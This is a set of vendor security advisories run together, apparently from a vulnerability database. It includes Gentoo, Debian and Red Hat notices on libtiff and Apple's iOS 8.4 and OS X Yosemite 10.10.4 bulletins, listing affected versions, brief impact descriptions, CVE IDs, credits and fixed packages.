http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3186\n[ 19 ] CVE-2016-3619\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3619\n[ 20 ] CVE-2016-3620\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3620\n[ 21 ] CVE-2016-3621\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3621\n[ 22 ] CVE-2016-3622\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3622\n[ 23 ] CVE-2016-3623\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3623\n[ 24 ] CVE-2016-3624\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3624\n[ 25 ] CVE-2016-3625\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3625\n[ 26 ] CVE-2016-3631\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3631\n[ 27 ] CVE-2016-3632\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3632\n[ 28 ] CVE-2016-3633\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3633\n[ 29 ] CVE-2016-3634\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3634\n[ 30 ] CVE-2016-3658\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3658\n[ 31 ] CVE-2016-3945\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3945\n[ 32 ] CVE-2016-3990\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3990\n[ 33 ] CVE-2016-3991\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3991\n[ 34 ] CVE-2016-5102\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5102\n[ 35 ] CVE-2016-5314\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5314\n[ 36 ] CVE-2016-5315\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5315\n[ 37 ] CVE-2016-5316\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5316\n[ 38 ] CVE-2016-5317\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5317\n[ 39 ] CVE-2016-5318\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5318\n[ 40 ] CVE-2016-5319\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5319\n[ 41 ] CVE-2016-5320\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5320\n[ 42 ] CVE-2016-5321\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5321\n[ 43 ] CVE-2016-5322\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5322\n[ 44 ] CVE-2016-5323\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5323\n[ 45 ] CVE-2016-5652\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5652\n[ 46 ] CVE-2016-5875\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5875\n[ 47 ] CVE-2016-6223\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6223\n[ 48 ] CVE-2016-8331\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8331\n[ 49 ] CVE-2016-9273\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9273\n[ 50 ] CVE-2016-9297\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9297\n[ 51 ] CVE-2016-9318\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9318\n[ 52 ] CVE-2016-9448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9448\n[ 53 ] CVE-2016-9453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9453\n[ 54 ] CVE-2016-9532\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9532\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201701-16\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n--WUa5dgL7FmU1aSF31hCrUKc2JiSevbqka--\n\n. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 4.0.2-6+deb7u4. \n\nFor the stable distribution (jessie), these problems have been fixed\nbefore the initial release. \n\nWe recommend that you upgrade your tiff packages. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-06-30-1 iOS 8.4\n\niOS 8.4 is now available and addresses the following:\n\nApplication Store\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious universal provisioning profile app may prevent\napps from launching\nDescription: An issue existed in the install logic for universal\nprovisioning profile apps, which allowed a collision to occur with\nexisting bundle IDs. \nCVE-ID\nCVE-2015-3722 : Zhaofeng Chen, Hui Xue, and Tao (Lenx) Wei from\nFireEye, Inc. \nCVE-ID\nCVE-2015-3710 : Aaron Sigel of vtty.com, Jan Soucek\n\nMobileInstallation\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious universal provisioning profile app can prevent a\nWatch app from launching\nDescription: An issue existed in the install logic for universal\nprovisioning profile apps on the Watch which allowed a collision to\noccur with existing bundle IDs. \nCVE-ID\nCVE-2015-3725 : Zhaofeng Chen, Hui Xue, and Tao (Lenx) Wei from\nFireEye, Inc. \n\nSafari\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may compromise user\ninformation on the filesystem\nDescription: A state management issue existed in Safari that allowed\nunprivileged origins to access contents on the filesystem. \nCVE-ID\nCVE-2015-1155 : Joe Vennix of Rapid7 Inc. \nCVE-ID\nCVE-2015-3726 : Matt Spisak of Endgame\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a malicious website by clicking a link may lead to\nuser interface spoofing\nDescription: An issue existed in the handling of the rel attribute\nin anchor elements. Target objects could get unauthorized access to\nlink objects. \nCVE-ID\nCVE-2015-3659 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A maliciously crafted website can access the WebSQL\ndatabases of other websites\nDescription: An issue existed in the authorization checks for\nrenaming WebSQL tables which could have allowed a maliciously crafted\nwebsite to access databases belonging to other websites. \nCVE-ID\nCVE-2015-3728 : Brian W. Gray of Carnegie Mellon University, Craig\nYoung from TripWire\n\n\nInstallation note:\n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: libtiff security update\nAdvisory ID: RHSA-2016:1547-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-1547.html\nIssue date: 2016-08-02\nCVE Names: CVE-2014-8127 CVE-2014-8129 CVE-2014-8130 \n CVE-2014-9330 CVE-2014-9655 CVE-2015-1547 \n CVE-2015-7554 CVE-2015-8665 CVE-2015-8668 \n CVE-2015-8683 CVE-2015-8781 CVE-2015-8782 \n CVE-2015-8783 CVE-2015-8784 CVE-2016-3632 \n CVE-2016-3945 CVE-2016-3990 CVE-2016-3991 \n CVE-2016-5320 \n=====================================================================\n\n1. Summary:\n\nAn update for libtiff is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThe libtiff packages contain a library of functions for manipulating Tagged\nImage File Format (TIFF) files. By tricking a user into processing a specially crafted file, a\nremote attacker could exploit these flaws to cause a crash or memory\ncorruption and, possibly, execute arbitrary code with the privileges of the\nuser running the libtiff tool. (CVE-2014-8127, CVE-2014-8129,\nCVE-2014-8130, CVE-2014-9330, CVE-2015-7554, CVE-2015-8668, CVE-2016-3632,\nCVE-2016-3945, CVE-2016-3991)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nAll running applications linked against libtiff must be restarted for this\nupdate to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1177893 - CVE-2014-9330 libtiff: Out-of-bounds reads followed by a crash in bmp2tiff\n1185805 - CVE-2014-8127 libtiff: out-of-bounds read with malformed TIFF image in multiple tools\n1185815 - CVE-2014-8129 libtiff: out-of-bounds read/write with malformed TIFF image in tiff2pdf\n1185817 - CVE-2014-8130 libtiff: divide by zero in the tiffdither tool\n1190703 - CVE-2014-9655 libtiff: use of uninitialized memory in putcontig8bitYCbCr21tile and NeXTDecode\n1190709 - CVE-2015-1547 libtiff: use of uninitialized memory in NeXTDecode\n1294417 - CVE-2015-7554 libtiff: Invalid-write in _TIFFVGetField() when parsing some extension tags\n1294425 - CVE-2015-8668 libtiff: OOB read in bmp2tiff\n1294427 - CVE-2015-8683 libtiff: Out-of-bounds when reading CIE Lab image format files\n1294444 - CVE-2015-8665 libtiff: Out-of-bounds read in tif_getimage.c\n1301649 - CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion\n1301652 - CVE-2015-8784 libtiff: out-of-bound write in NeXTDecode()\n1325093 - CVE-2016-3945 libtiff: out-of-bounds write in the tiff2rgba tool\n1325095 - CVE-2016-3632 libtiff: out-of-bounds write in _TIFFVGetField function\n1326246 - CVE-2016-3990 libtiff: out-of-bounds write in horizontalDifference8()\n1326249 - CVE-2016-3991 libtiff: out-of-bounds write in loadImage() function\n1346687 - CVE-2016-5320 libtiff: Out-of-bounds write in PixarLogDecode() function in tif_pixarlog.c\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nlibtiff-3.9.4-18.el6_8.src.rpm\n\ni386:\nlibtiff-3.9.4-18.el6_8.i686.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.i686.rpm\n\nx86_64:\nlibtiff-3.9.4-18.el6_8.i686.rpm\nlibtiff-3.9.4-18.el6_8.x86_64.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.i686.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nlibtiff-debuginfo-3.9.4-18.el6_8.i686.rpm\nlibtiff-devel-3.9.4-18.el6_8.i686.rpm\nlibtiff-static-3.9.4-18.el6_8.i686.rpm\n\nx86_64:\nlibtiff-debuginfo-3.9.4-18.el6_8.i686.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm\nlibtiff-devel-3.9.4-18.el6_8.i686.rpm\nlibtiff-devel-3.9.4-18.el6_8.x86_64.rpm\nlibtiff-static-3.9.4-18.el6_8.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nlibtiff-3.9.4-18.el6_8.src.rpm\n\nx86_64:\nlibtiff-3.9.4-18.el6_8.i686.rpm\nlibtiff-3.9.4-18.el6_8.x86_64.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.i686.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nlibtiff-debuginfo-3.9.4-18.el6_8.i686.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm\nlibtiff-devel-3.9.4-18.el6_8.i686.rpm\nlibtiff-devel-3.9.4-18.el6_8.x86_64.rpm\nlibtiff-static-3.9.4-18.el6_8.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nlibtiff-3.9.4-18.el6_8.src.rpm\n\ni386:\nlibtiff-3.9.4-18.el6_8.i686.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.i686.rpm\nlibtiff-devel-3.9.4-18.el6_8.i686.rpm\n\nppc64:\nlibtiff-3.9.4-18.el6_8.ppc.rpm\nlibtiff-3.9.4-18.el6_8.ppc64.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.ppc.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.ppc64.rpm\nlibtiff-devel-3.9.4-18.el6_8.ppc.rpm\nlibtiff-devel-3.9.4-18.el6_8.ppc64.rpm\n\ns390x:\nlibtiff-3.9.4-18.el6_8.s390.rpm\nlibtiff-3.9.4-18.el6_8.s390x.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.s390.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.s390x.rpm\nlibtiff-devel-3.9.4-18.el6_8.s390.rpm\nlibtiff-devel-3.9.4-18.el6_8.s390x.rpm\n\nx86_64:\nlibtiff-3.9.4-18.el6_8.i686.rpm\nlibtiff-3.9.4-18.el6_8.x86_64.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.i686.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm\nlibtiff-devel-3.9.4-18.el6_8.i686.rpm\nlibtiff-devel-3.9.4-18.el6_8.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nlibtiff-debuginfo-3.9.4-18.el6_8.i686.rpm\nlibtiff-static-3.9.4-18.el6_8.i686.rpm\n\nppc64:\nlibtiff-debuginfo-3.9.4-18.el6_8.ppc64.rpm\nlibtiff-static-3.9.4-18.el6_8.ppc64.rpm\n\ns390x:\nlibtiff-debuginfo-3.9.4-18.el6_8.s390x.rpm\nlibtiff-static-3.9.4-18.el6_8.s390x.rpm\n\nx86_64:\nlibtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm\nlibtiff-static-3.9.4-18.el6_8.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nlibtiff-3.9.4-18.el6_8.src.rpm\n\ni386:\nlibtiff-3.9.4-18.el6_8.i686.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.i686.rpm\nlibtiff-devel-3.9.4-18.el6_8.i686.rpm\n\nx86_64:\nlibtiff-3.9.4-18.el6_8.i686.rpm\nlibtiff-3.9.4-18.el6_8.x86_64.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.i686.rpm\nlibtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm\nlibtiff-devel-3.9.4-18.el6_8.i686.rpm\nlibtiff-devel-3.9.4-18.el6_8.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nlibtiff-debuginfo-3.9.4-18.el6_8.i686.rpm\nlibtiff-static-3.9.4-18.el6_8.i686.rpm\n\nx86_64:\nlibtiff-debuginfo-3.9.4-18.el6_8.x86_64.rpm\nlibtiff-static-3.9.4-18.el6_8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-8127\nhttps://access.redhat.com/security/cve/CVE-2014-8129\nhttps://access.redhat.com/security/cve/CVE-2014-8130\nhttps://access.redhat.com/security/cve/CVE-2014-9330\nhttps://access.redhat.com/security/cve/CVE-2014-9655\nhttps://access.redhat.com/security/cve/CVE-2015-1547\nhttps://access.redhat.com/security/cve/CVE-2015-7554\nhttps://access.redhat.com/security/cve/CVE-2015-8665\nhttps://access.redhat.com/security/cve/CVE-2015-8668\nhttps://access.redhat.com/security/cve/CVE-2015-8683\nhttps://access.redhat.com/security/cve/CVE-2015-8781\nhttps://access.redhat.com/security/cve/CVE-2015-8782\nhttps://access.redhat.com/security/cve/CVE-2015-8783\nhttps://access.redhat.com/security/cve/CVE-2015-8784\nhttps://access.redhat.com/security/cve/CVE-2016-3632\nhttps://access.redhat.com/security/cve/CVE-2016-3945\nhttps://access.redhat.com/security/cve/CVE-2016-3990\nhttps://access.redhat.com/security/cve/CVE-2016-3991\nhttps://access.redhat.com/security/cve/CVE-2016-5320\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update\n2015-005\n\nOS X Yosemite v10.10.4 and Security Update 2015-005 are now available\nand address the following:\n\nAdmin Framework\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A process may gain admin privileges without proper\nauthentication\nDescription: An issue existed when checking XPC entitlements. This\nissue was addressed through improved entitlement checking. \nCVE-ID\nCVE-2015-3671 : Emil Kvarnhammar at TrueSec\n\nAdmin Framework\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A non-admin user may obtain admin rights\nDescription: An issue existed in the handling of user\nauthentication. This issue was addressed through improved error\nchecking. \nCVE-ID\nCVE-2015-3672 : Emil Kvarnhammar at TrueSec\n\nAdmin Framework\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker may abuse Directory Utility to gain root\nprivileges\nDescription: Directory Utility was able to be moved and modified to\nachieve code execution within an entitled process. This issue was\naddressed by limiting the disk location that writeconfig clients may\nbe executed from. \nCVE-ID\nCVE-2015-3673 : Patrick Wardle of Synack, Emil Kvarnhammar at TrueSec\n\nafpserver\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may be able to cause unexpected\napplication termination or arbitrary code execution\nDescription: A memory corruption issue existed in the AFP server. \nThis issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-3674 : Dean Jerkovich of NCC Group\n\napache\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker may be able to access directories that are\nprotected with HTTP authentication without knowing the correct\ncredentials\nDescription: The default Apache configuration did not include\nmod_hfs_apple. If Apache was manually enabled and the configuration\nwas not changed, some files that should not be accessible might have\nbeen accessible using a specially crafted URL. This issue was\naddressed by enabling mod_hfs_apple. \nCVE-ID\nCVE-2015-3675 : Apple\n\napache\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple vulnerabilities exist in PHP, the most serious of\nwhich may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in PHP versions prior\nto 5.5.24 and 5.4.40. These were addressed by updating PHP to\nversions 5.5.24 and 5.4.40. \nCVE-ID\nCVE-2015-0235\nCVE-2015-0273\n\nAppleGraphicsControl\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in AppleGraphicsControl which could\nhave led to the disclosure of kernel memory layout. This issue was\naddressed through improved bounds checking. \nCVE-ID\nCVE-2015-3676 : Chen Liang of KEEN Team\n\nAppleFSCompression\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in LZVN compression that could have\nled to the disclosure of kernel memory content. This issue was\naddressed through improved memory handling. \nCVE-ID\nCVE-2015-3677 : an anonymous researcher working with HP\u0027s Zero Day\nInitiative\n\nAppleThunderboltEDMService\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in the handling of\ncertain Thunderbolt commands from local processes. This issue was\naddressed through improved memory handling. \nCVE-ID\nCVE-2015-3678 : Apple\n\nATS\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in handling\nof certain fonts. These issues were addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-3679 : Pawel Wylecial working with HP\u0027s Zero Day Initiative\nCVE-2015-3680 : Pawel Wylecial working with HP\u0027s Zero Day Initiative\nCVE-2015-3681 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3682 : Nuode Wei\n\nBluetooth\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in the Bluetooth HCI\ninterface. This issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-3683 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nCertificate Trust Policy\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: An attacker with a privileged network position may be able\nto intercept network traffic\nDescription: An intermediate certificate was incorrectly issued by\nthe certificate authority CNNIC. This issue was addressed through the\naddition of a mechanism to trust only a subset of certificates issued\nprior to the mis-issuance of the intermediate. Further details are\navailable at https://support.apple.com/en-us/HT204938\n\nCertificate Trust Policy\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nDescription: The certificate trust policy was updated. The complete\nlist of certificates may be viewed at https://support.apple.com/en-\nus/HT202858. \n\nCFNetwork HTTPAuthentication\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Following a maliciously crafted URL may lead to arbitrary\ncode execution\nDescription: A memory corruption issue existed in handling of\ncertain URL credentials. This issue was addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-3684 : Apple\n\nCoreText\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted text file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nprocessing of text files. These issues were addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2015-1157\nCVE-2015-3685 : Apple\nCVE-2015-3686 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3687 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3688 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3689 : Apple\n\ncoreTLS\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker with a privileged network position may intercept\nSSL/TLS connections\nDescription: coreTLS accepted short ephemeral Diffie-Hellman (DH)\nkeys, as used in export-strength ephemeral DH cipher suites. This\nissue, also known as Logjam, allowed an attacker with a privileged\nnetwork position to downgrade security to 512-bit DH if the server\nsupported an export-strength ephemeral DH cipher suite. The issue was\naddressed by increasing the default minimum size allowed for DH\nephemeral keys to 768 bits. \nCVE-ID\nCVE-2015-4000 : The weakdh team at weakdh.org, Hanno Boeck\n\nDiskImages\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An information disclosure issue existed in the\nprocessing of disk images. This issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2015-3690 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nDisplay Drivers\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: An issue existed in the Monitor Control Command Set\nkernel extension by which a userland process could control the value\nof a function pointer within the kernel. The issue was addressed by\nremoving the affected interface. \nCVE-ID\nCVE-2015-3691 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nEFI\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application with root privileges may be able to\nmodify EFI flash memory\nDescription: An insufficient locking issue existed with EFI flash\nwhen resuming from sleep states. This issue was addressed through\nimproved locking. \nCVE-ID\nCVE-2015-3692 : Trammell Hudson of Two Sigma Investments, Xeno Kovah\nand Corey Kallenberg of LegbaCore LLC, Pedro Vilaca\n\nEFI\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may induce memory corruption to\nescalate privileges\nDescription: A disturbance error, also known as Rowhammer, exists\nwith some DDR3 RAM that could have led to memory corruption. This\nissue was mitigated by increasing memory refresh rates. \nCVE-ID\nCVE-2015-3693 : Mark Seaborn and Thomas Dullien of Google, working\nfrom original research by Yoongu Kim et al (2014)\n\nFontParser\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-3694 : John Villamil (@day6reak), Yahoo Pentest Team\n\nGraphics Driver\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: An out of bounds write issue existed in NVIDIA graphics\ndriver. This issue was addressed through improved bounds checking. \nCVE-ID\nCVE-2015-3712 : Ian Beer of Google Project Zero\n\nIntel Graphics Driver\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple buffer overflow issues exist in the Intel graphics\ndriver, the most serious of which may lead to arbitrary code\nexecution with system privileges\nDescription: Multiple buffer overflow issues existed in the Intel\ngraphics driver. These were addressed through additional bounds\nchecks. \nCVE-ID\nCVE-2015-3695 : Ian Beer of Google Project Zero\nCVE-2015-3696 : Ian Beer of Google Project Zero\nCVE-2015-3697 : Ian Beer of Google Project Zero\nCVE-2015-3698 : Ian Beer of Google Project Zero\nCVE-2015-3699 : Ian Beer of Google Project Zero\nCVE-2015-3700 : Ian Beer of Google Project Zero\nCVE-2015-3701 : Ian Beer of Google Project Zero\nCVE-2015-3702 : KEEN Team\n\nImageIO\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple vulnerabilities existed in libtiff, the most\nserious of which may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in libtiff versions\nprior to 4.0.4. They were addressed by updating libtiff to version\n4.0.4. \nCVE-ID\nCVE-2014-8127\nCVE-2014-8128\nCVE-2014-8129\nCVE-2014-8130\n\nImageIO\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted .tiff file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\n.tiff files. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-3703 : Apple\n\nInstall Framework Legacy\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Several issues existed in how Install.framework\u0027s\n\u0027runner\u0027 setuid binary dropped privileges. This was addressed by\nproperly dropping privileges. \nCVE-ID\nCVE-2015-3704 : Ian Beer of Google Project Zero\n\nIOAcceleratorFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Multiple memory corruption issues existed in\nIOAcceleratorFamily. These issues were addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-3705 : KEEN Team\nCVE-2015-3706 : KEEN Team\n\nIOFireWireFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Multiple null pointer dereference issues existed in the\nFireWire driver. These issues were addressed through improved error\nchecking. \nCVE-ID\nCVE-2015-3707 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: A memory management issue existed in the handling of\nAPIs related to kernel extensions which could have led to 